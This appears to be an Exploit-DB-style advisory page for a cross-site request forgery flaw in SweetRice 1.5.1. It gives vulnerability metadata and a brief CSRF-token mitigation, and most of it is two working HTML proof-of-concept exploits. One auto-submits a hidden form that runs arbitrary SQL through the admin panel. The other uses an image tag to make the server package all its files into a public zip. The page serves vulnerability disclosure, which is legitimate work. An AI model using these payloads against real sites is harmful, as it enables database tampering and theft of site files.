SweetRice 1.5.1 - Cross-Site Request Forgery

vendor:

SweetRice

by:

Ashiyane Digital Security Team

8,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: SweetRice

Affected Version From: 1.5.1

Affected Version To: 1.5.1

Patch Exists: NO

Related CWE: N/A

CPE: a:basic-cms:sweetrice:1.5.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WebApp - PHP - Mysql

2016

SweetRice 1.5.1 – Cross-Site Request Forgery

SweetRice 1.5.1 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can exploit this vulnerability to execute arbitrary SQL commands and transfer files to the web server. The first exploit sends a POST request with a malicious SQL command to the vulnerable application. The second exploit sends a GET request with a malicious file name to the vulnerable application.

Mitigation:

Implementing a CSRF token in the application can prevent this vulnerability.

Source

Exploit-DB raw data:

<!--
# Exploit Title: SweetRice 1.5.1 - Cross-Site Request Forgery
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

# Exploit 1:
-->
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://localhost/as/?type=data&mode=sql_execute&form_mode=yes" method="POST">
      <input type="hidden" name='sql_content' value="CREATE DATABASE testfcb">
      <input type="submit" value="Execute" />
      </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>

<!--
Exploit 2:
Next send request a file with name 'SweetRice-transfer.zip' create in main directory and you can access to all of files in this url:
http://localhost/SweetRice-transfer.zip
-->
<html>
  <!-- CSRF PoC -->
  <body>
    <img src='http://localhost/1/as/?type=data&mode=transfer&form_type=pack'></img>
  </body>
</html>